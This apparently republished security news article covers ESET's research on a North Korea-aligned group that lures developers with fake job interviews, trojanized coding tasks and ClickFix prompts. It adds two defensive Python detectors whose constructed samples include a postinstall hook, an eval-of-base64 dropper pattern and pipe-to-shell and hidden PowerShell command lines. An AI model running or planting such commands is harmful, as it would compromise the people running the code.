North Korean IT workers use fake profiles to steal crypto

ESET Research has published new findings on DeceptiveDevelopment, also called Contagious Interview. This North Korea-aligned group has become more active in recent years and focuses on stealing cryptocurrency. It targets freelance developers working on Windows, Linux, and macOS systems.

A growing threat to developers

The group’s campaigns use social engineering tricks, including fake job interviews and a method known as ClickFix, to spread malware and steal cryptocurrency.

ESET also reviewed open-source intelligence data about North Korean IT workers involved in fraudulent job schemes. This information links these workers to DeceptiveDevelopment and gives insight into how the group operates.

DeceptiveDevelopment has been active since at least 2023 and is financially motivated. It targets developers working on cryptocurrency and Web3 projects. Initial access comes through social engineering: fake recruiter profiles in the style of Lazarus’s Operation DreamJob, and the ClickFix technique. Once contact is made, the group delivers trojanized code to the target during a staged job interview. Its most common tools are the BeaverTail, OtterCookie, and WeaselStore infostealers and the InvisibleFerret modular remote access tool.

“DeceptiveDevelopment operators use fake recruiter profiles on social media, in a fashion similar to Lazarus’s Operation DreamJob. However, in this case, they specifically reached out to software developers, often those involved in cryptocurrency projects, providing potential victims with trojanized codebases that deploy backdoors as part of a faux job interview process,” says Peter Kálnai, one of the co-authors of the research paper. “The individuals behind all these activities trade high-end technical sophistication for a broad scale of operations and highly creative social engineering. Their malware is mostly simple, yet they manage to lure even tech-savvy targets,” adds Kálnai.

How fake job interviews lead to malware

The attackers use several methods to compromise victims, all built on social engineering. Using fake or hijacked profiles, they pose as recruiters on LinkedIn, Upwork, Freelancer.com, and Crypto Jobs List and offer fake job opportunities to attract a target’s interest. Once someone engages, they are asked to complete a coding challenge or a pre-interview task, and the code they receive for it is the delivery vehicle for the malware.
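The practical defence against a trojanized “coding challenge” is to triage the repository before running `npm install` or the test suite. The script below is an added example, not ESET’s code and not a signature for this group’s actual samples: it scans a repository for the traits that make a take-home task dangerous, namely package lifecycle scripts that execute on install, dynamic code execution, and long base64 blobs that usually hide a stage-two payload. The sample repository contents are constructed for the example.

```python
import json
import re

# Constructed sample of a "coding challenge" repository, keyed by relative path.
# The content is made up for this example; it is not a real sample from the campaign.
SAMPLE_REPO = {
    "package.json": json.dumps({
        "name": "trading-dashboard-challenge",
        "version": "1.0.0",
        "scripts": {
            "test": "jest",
            # runs automatically on `npm install`, before the candidate reads any code
            "postinstall": "node ./config/setup.js",
        },
    }, indent=2),
    "config/setup.js": (
        "// harmless-looking bootstrap\n"
        "const p = require('child_process');\n"
        "const b = '" + "QUJD" * 80 + "';\n"          # 320-char base64-looking literal
        "eval(Buffer.from(b, 'base64').toString());\n"
    ),
    "src/index.js": "export function add(a, b) { return a + b; }\n",
}

# npm script names that run without the user explicitly invoking them.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}

# A quoted run of 200+ base64-alphabet characters is rarely legitimate in source code.
BASE64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")

# Dynamic execution and process spawning primitives commonly used by droppers.
DANGEROUS_CALLS = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|child_process|\bexecSync?\s*\(|\bspawn\s*\("
)


def scan_repo(files):
    """Return (path, rule, detail) findings for a repo given as {relpath: text}."""
    findings = []
    for path, text in files.items():
        if path.endswith("package.json"):
            try:
                scripts = json.loads(text).get("scripts", {})
            except json.JSONDecodeError:
                findings.append((path, "unparseable-package-json", ""))
                continue
            for hook, cmd in scripts.items():
                if hook in LIFECYCLE_HOOKS:
                    findings.append((path, "lifecycle-script", f"{hook}: {cmd}"))
            continue
        if path.endswith((".js", ".ts", ".mjs", ".cjs")):
            for m in DANGEROUS_CALLS.finditer(text):
                findings.append((path, "dynamic-exec", m.group(0).strip()))
            for m in BASE64_BLOB.finditer(text):
                findings.append((path, "base64-blob", f"{len(m.group(1))} chars"))
            # A single very long line in an otherwise readable file often carries a minified payload.
            longest = max((len(line) for line in text.splitlines()), default=0)
            if longest > 1000:
                findings.append((path, "long-line", f"{longest} chars"))
    return findings


if __name__ == "__main__":
    for path, rule, detail in scan_repo(SAMPLE_REPO):
        print(f"{rule:<22} {path:<20} {detail}")
```

In real use, read the cloned tree into the dictionary (or adapt `scan_repo` to walk the directory) and run it before any install step; `npm install --ignore-scripts` is the companion control, since a lifecycle hook is the easiest place to hide the first stage.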

Beyond fake recruiter accounts, the attackers have adapted a social engineering technique called ClickFix. Victims are directed to a fake job interview site and asked to fill out a detailed application form, investing significant time in the process before the payload is ever mentioned.

At the final stage, the site asks them to record a video answer. The camera then appears to fail: the site shows a fabricated error message and provides a link labeled “How to fix.” Following the instructions, victims open a terminal and paste in a command that is supposed to fix the problem; instead, it downloads and runs the malware.
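The defining trace of a ClickFix compromise is a command the user pasted into their own terminal. The following is an added example, not code from ESET’s report, and the article does not reproduce the group’s actual commands, so the patterns are generic heuristics for the shape of a “paste this to fix it” instruction: remote fetch piped straight into an interpreter, encoded payloads, and hidden-window flags on Windows. It can be run over shell history or over process command-line telemetry. The history lines are constructed for the example and the hostnames are placeholders.

```python
import re

# Indicator patterns for commands typical of "paste this to fix it" lures.
# Heuristic only; not a signature for any specific campaign's commands.
INDICATORS = {
    "remote-fetch": re.compile(
        r"\b(curl|wget|Invoke-WebRequest|iwr|irm|Invoke-RestMethod)\b", re.I),
    "pipe-to-interpreter": re.compile(
        r"\|\s*(sudo\s+)?(ba|z|da|k)?sh\b"          # ... | bash / sh / zsh
        r"|\|\s*(iex|Invoke-Expression)\b"          # ... | iex
        r"|\|\s*(python3?|node|perl)\b", re.I),     # ... | python3
    "encoded-payload": re.compile(
        r"base64\s+(-d|--decode)"                   # echo ... | base64 -d
        r"|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}"   # powershell -enc <b64>
        r"|FromBase64String", re.I),
    "inline-eval": re.compile(r"\beval\b|\b(iex|Invoke-Expression)\b|\bmshta\b", re.I),
    "stealth-flags": re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|ExecutionPolicy\s+Bypass", re.I),
}

# Constructed shell history; a developer's normal activity with three lure-shaped lines mixed in.
SAMPLE_HISTORY = [
    "git clone https://github.com/example/challenge-repo.git",
    "npm install",
    "npm test",
    "curl -fsSL https://camera-fix.example.invalid/fix.sh | bash",   # placeholder host
    "echo aGVsbG8gd29ybGQK | base64 -d | sh",
    "powershell -w hidden -nop -enc " + "QQBB" * 15,                  # constructed base64 blob
    "ls -la",
]


def classify_command(cmd):
    """Return the sorted indicator names that fire on one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def is_clickfix_like(cmd):
    """A lone curl or wget is normal developer activity; flag only when the command
    pipes into an interpreter, carries an encoded payload, or stacks two indicators."""
    hits = classify_command(cmd)
    return "pipe-to-interpreter" in hits or "encoded-payload" in hits or len(hits) >= 2


def scan_history(lines):
    """Return (line, indicators) for every history line that looks like a ClickFix paste."""
    return [(line, classify_command(line)) for line in lines if is_clickfix_like(line)]


if __name__ == "__main__":
    for line, hits in scan_history(SAMPLE_HISTORY):
        print(f"{', '.join(hits):<40} {line}")
```

The same rules translate directly into an EDR or SIEM query on process creation events where the parent is a terminal emulator or `explorer.exe` and the command line matches; the point of the scoring function is to keep ordinary `curl` usage out of the alert queue.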

Links to a broader fraud campaign

ESET’s research is based on telemetry data and reverse engineering of the group’s tools. It also connects DeceptiveDevelopment to a broader campaign run by North Korean IT workers involved in fraud. According to the FBI, this campaign has been active since at least April 2017 and has grown in recent years.

In a May 2022 joint advisory, the FBI described the campaign as a coordinated effort by North Korean workers to get jobs at overseas companies. Their salaries are then funneled back to North Korea. The workers have also stolen internal company data and used it for extortion, as stated by the FBI in January 2025.

ESET found evidence in open-source intelligence data, fake resumes, and other materials that these workers focus on jobs and contract work in Western countries, especially the United States. More recently, they have also expanded into Europe, with targets in France, Poland, Ukraine, and Albania. They use AI both to do the work and to create realistic fake identities: AI tools are used to alter photos in resumes and even to swap faces in real-time video calls so that the person on camera matches the false identity being used.

The risks of proxy interviewing

These workers rely on platforms such as Zoom, MiroTalk, FreeConference, and Microsoft Teams to carry out their schemes. Proxy interviewing, where the person who appears in the interview is not the person who will actually do the work, poses a serious risk to employers. Hiring someone from a sanctioned country is not only unethical and potentially unproductive; it can also introduce an insider threat and significant security risks.

“The activities of North Korean IT workers constitute a hybrid threat. This fraud-for-hire scheme combines classical criminal operations, such as identity theft and synthetic identity fraud, with digital tools, which classify it as both a traditional crime and a cybercrime,” comments Kálnai.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.